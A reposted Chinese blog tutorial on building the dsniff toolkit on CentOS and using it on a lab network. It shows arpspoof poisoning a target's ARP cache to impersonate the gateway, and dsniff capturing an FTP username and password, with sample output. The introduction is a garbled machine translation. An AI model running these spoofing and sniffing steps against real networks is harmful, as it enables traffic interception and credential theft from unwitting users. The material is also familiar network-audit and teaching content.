AI 助理
备案控制台
开发者社区 开发与运维 文章 正文

linux 实现嗅探工具dsniff

2017-11-27 2509
版权
版权声明:
本文内容由阿里云实名注册用户自发贡献,版权归原作者所有,阿里云开发者社区不拥有其著作权,亦不承担相应法律责任。具体规则请查看《 阿里云开发者社区用户服务协议》和 《阿里云开发者社区知识产权保护指引》。如果您发现本社区中有涉嫌抄袭的内容,填写 侵权投诉表单进行举报,一经查实,本社区将立刻删除涉嫌侵权内容。
简介:

dsniff是一家集工具为网络审计和渗透测试dsniff,filesnarf,mailsnarf,msgsnarf,urlsnarf,webspy被动监测网络的数据(密码、电子邮件、文件等)。arpspoof,dnsspoof,macof方便截取网络流量通常不能攻击者(e。g,由于第2层交换)。sshmitm和webmitm实现主动的猴子在中间攻击重定向SSH和HTTPS会话利用弱绑定在特别的PKI。我写这些工具与诚实的意图——审计自己的网络,并证明了大多数网络应用协议不安全感。请不要滥用这种软件


实验环境

centos-5.5


使用软件

openssl-0.9.7i.tar.gz

libnids-1.18.tar.gz

libpcap-0.7.2.tar.gz

libnet-1.0.2a.tar.gz

db-4.7.25.tar.gz

dsniff-2.3.tar.gz


软件安装

yum install -y gcc gcc-c++ flex bison

tar zxvf openssl-0.9.7i.tar.gz

cd openssl-0.9.7l

./config

make

make install


tar zxvf libpcap-0.7.2.tar.gz

cd libpcap-0.7.2

./configure

make

make install


tar zxvf libnet-1.0.2a.tar.gz

cd Libnet-1.0.2a

./configure

make

make install


tar zxvf libnids-1.18.tar.gz

cd libnids-1.18

./configure

make

make install


tar zxvf db-4.7.25.tar.gz

cd db-4.7.25/build_unix

../dist/configure --enable-compat185

make

make install


tar zxvf dsniff-2.3.tar.gz

cd dsniff-2.3

vim arp.c

11 #include "config.h"

添加 #include "memory.h"

11 #include "config.h"

12 #include "memory.h"

./configure --enable-compat185 --with-db=/usr/local/BerkeleyDB.4.7

make

make install


设置

vim /etc/sysctl.conf

找到 net.ipv4.ip_forward = 0

修改 net.ipv4.ip_forward = 1

sysctl -p 修改生效,无需重启系统

cp -p /usr/local/BerkeleyDB.4.7/lib/libdb-4.7.so /usr/lib

cd /usr/local/sbin;ls 如果有dsniff,既为安装成功

到此为止dsniff,安装成功了。


使用方法

使用 arpspoof 对目标机实施ARP欺骗攻击

arpspoof -i eth0 -t 192.168.0.103 192.168.0.1 192.168.0.1 为伪装网关地址

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3

0:c:29:2f:29:e3 0:c:29:e1:7c:52 0806 42: arp reply 192.168.0.1 is-at 0:c:29:2f:29:e3



使用 dsniff 取得指定端口的数据信息

dsniff -i eth0 -t 21/tcp=ftp,80/tcp=http

dsniff: listening on eth0

-----------------

08/06/13 10:12:35 tcp 192.168.0.103.3043 -> 192.168.0.102.21 (ftp)

USER anonymous

PASS IEUser@


dsniff这是一个口令嗅探器,可以处理的协议类型包括: 
FTP,Telnet,SMTP,HTTP,POP,NNTP,IMAP,SNMP,LDAP,Rlogin,RIP,OSP 
F,PPTP,MS-CHAP,NFS,VRRP,YP/NIS,SOCKS,X11,CVS,IRC,AIM,ICQ,Napster,ostgreSQL,
MeetingMaker,CitrixICA,Symantec,pcAnywhere,NA 
ISniffer,MicrosoftSMB,OracleQL*Net,Sybase及MicrosoftSQL认证信息




本文转自 mailfile 51CTO博客,原文链接:http://blog.51cto.com/mailfile/1327675,如需转载请自行联系原作者

文章标签:
Linux
网络协议
关键词:
Linux工具
Linux实现
Linux嗅探工具
Linux嗅探工具dsniff
技术小阿哥
目录
相关文章
aliyun3944920541
|
4月前
|
Linux 开发工具
7种比较Linux中文本文件的最佳工具
7种比较Linux中文本文件的最佳工具
aliyun3944920541
204 0
7种比较Linux中文本文件的最佳工具
蓝易云
|
2月前
|
Linux 数据安全/隐私保护 iOS开发
推荐Linux环境下效能优良的双向文件同步工具
综合上述条件,对于Linux环境下的双向文件同步需求,Unison 和 Syncthing 是两个非常出色的选择。它们都有良好的社区支持和文档资源,适用于不同规模的环境,从个人使用到商业部署。Unison 特别适合那些需要手动干预同步过程、需要处理文件冲突解决的场景。而 Syncthing 更加现代化,适合需要自动、实时的数据同步与备份的环境。对于选择哪一个,这将取决于个人的使用场景和具体需求。
蓝易云
253 16
蓝易云
|
4月前
|
Ubuntu 搜索推荐 Linux
详解Ubuntu的strings与grep命令:Linux开发的实用工具。
这就是Ubuntu中的strings和grep命令,透明且强大。我希望你喜欢这个神奇的世界,并能在你的Linux开发旅程上,通过它们找到你的方向。记住,你的电脑是你的舞台,在上面你可以做任何你想做的事,只要你敢于尝试。
蓝易云
257 32
sysin
|
6月前
|
自然语言处理 数据库 iOS开发
DBeaver Ultimate Edtion 25.0 Multilingual (macOS, Linux, Windows) - 通用数据库工具
DBeaver Ultimate Edtion 25.0 Multilingual (macOS, Linux, Windows) - 通用数据库工具
sysin
416 12
DBeaver Ultimate Edtion 25.0 Multilingual (macOS, Linux, Windows) - 通用数据库工具
1239147665459462
|
5月前
|
运维 安全 Linux
试试Linux设备命令行运维工具——Wowkey
WowKey 是一款专为 Linux 设备设计的命令行运维工具,提供自动化、批量化、标准化、简单化的运维解决方案。它简单易用、高效集成且无依赖,仅需 WIS 指令剧本文件、APT 账号密码文件和 wowkey 命令即可操作。通过分离鉴权内容与执行内容,WowKey 让运维人员专注于决策,摆脱繁琐的交互与执行细节工作,大幅提升运维效率与质量。无论是健康检查、数据采集还是配置更新,WowKey 都能助您轻松应对大规模设备运维挑战。立即从官方资源了解更多信息:https://atsight.top/training。
1239147665459462
259 6
1239147665459462
|
5月前
|
数据采集 运维 安全
Linux设备命令行运维工具WowKey问答
WowKey 是一款用于 Linux 设备运维的工具,可通过命令行手动或自动执行指令剧本,实现批量、标准化操作,如健康检查、数据采集、配置更新等。它简单易用,只需编写 WIS 指令剧本和 APT 帐号密码表文件,学习成本极低。支持不同流派的 Linux 系统,如 RHEL、Debian、SUSE 等,只要使用通用 Shell 命令即可通吃Linux设备。
1239147665459462
94 1
盹猫
|
2月前
|
监控 Linux 网络安全
Linux命令大全:从入门到精通
日常使用的linux命令整理
盹猫
622 13
蓝易云
|
3月前
|
Linux 网络安全 数据安全/隐私保护
使用Linux系统的mount命令挂载远程服务器的文件夹。
如此一来,你就完成了一次从你的Linux发车站到远程服务器文件夹的有趣旅行。在这个技术之旅中,你既探索了新地方,也学到了如何桥接不同系统之间的距离。
蓝易云
442 21
刘俊辉个人博客
|
3月前
|
JSON 自然语言处理 Linux
linux命令—tree
tree是一款强大的Linux命令行工具,用于以树状结构递归展示目录和文件,直观呈现层级关系。支持多种功能,如过滤、排序、权限显示及格式化输出等。安装方法因系统而异常用场景包括:基础用法(显示当前或指定目录结构)、核心参数应用(如层级控制-L、隐藏文件显示-a、完整路径输出-f)以及进阶操作(如磁盘空间分析--du、结合grep过滤内容、生成JSON格式列表-J等)。此外,还可生成网站目录结构图并导出为HTML文件。注意事项:使用Tab键补全路径避免错误;超大目录建议限制遍历层数;脚本中推荐禁用统计信息以优化性能。更多详情可查阅手册mantree。
刘俊辉个人博客
164 7
linux命令—tree

热门文章

最新文章

  • 1
    VirtualBox 7.2.0 (macOS, Linux, Windows) - 开源跨平台虚拟化软件
  • 2
    阿里云服务器ECS安装宝塔Linux面板、安装网站(新手图文教程)
  • 3
    Linux系统清理缓存(buff/cache)的有效方法。
  • 4
    为Linux系统的普通账户授予sudo访问权限的过程
  • 5
    Tenable Nessus 10.9.3 (macOS, Linux, Windows) - 漏洞评估解决方案
  • 6
    Studio 3T 2025.14 (macOS, Linux, Windows) - MongoDB 的终极 GUI、IDE 和 客户端
  • 7
    CrossOver 25.1.0 for macOS & Linux - 领先的 Wine 解决方案
  • 8
    SonarQube Server 2025 Release 4.2 (macOS, Linux, Windows) - 代码质量、安全与静态分析工具
  • 9
    Linux环境下删除大文件后磁盘空间未释放问题诊断流程。
  • 10
    Nexpose 8.18.0 for Linux & Windows - 漏洞扫描
  • 1
    Windows就是Linux:WSL带来全新Linux开发体验
    925
  • 2
    【Linux系统】使用g = GloveEmbedding()报错BadZipFile: File is not a zip file
    136
  • 3
    7zip压缩工具的Linux命令
    574
  • 4
    Linux系统的优势
    404
  • 5
    [linux]常见内核TCP参数描述与配置
    333
  • 6
    linux测试ipv6
    400
  • 7
    [linux]frp内网穿透
    216
  • 8
    [linux]搭建nfs
    73
  • 9
    linux设置信号量系统参数
    167
  • 10
    理解linux的CPU上下文切换
    161

    • 相关课程

    更多
  • Linux高级网络应用 - 网络管理与配置实战
  • Linux用户和组管理
  • Linux基本命令
  • Linux企业运维实战 - 入门及常用命令
  • Linux Shell 编程入门与实战
  • Linux网络进阶 - TCP/IP协议及OSI七层模型

    • 相关电子书

    更多
  • Alibaba Cloud Linux 3 发布
  • ECS系统指南之Linux系统诊断
  • ECS运维指南 之 Linux系统诊断

    • 推荐镜像

    更多
  • mxlinux-iso
  • archlinuxarm
  • archlinuxcn
    • 下一篇
    蛋白质语言模型 ProGen:在实验室合成由 AI 预测的蛋白质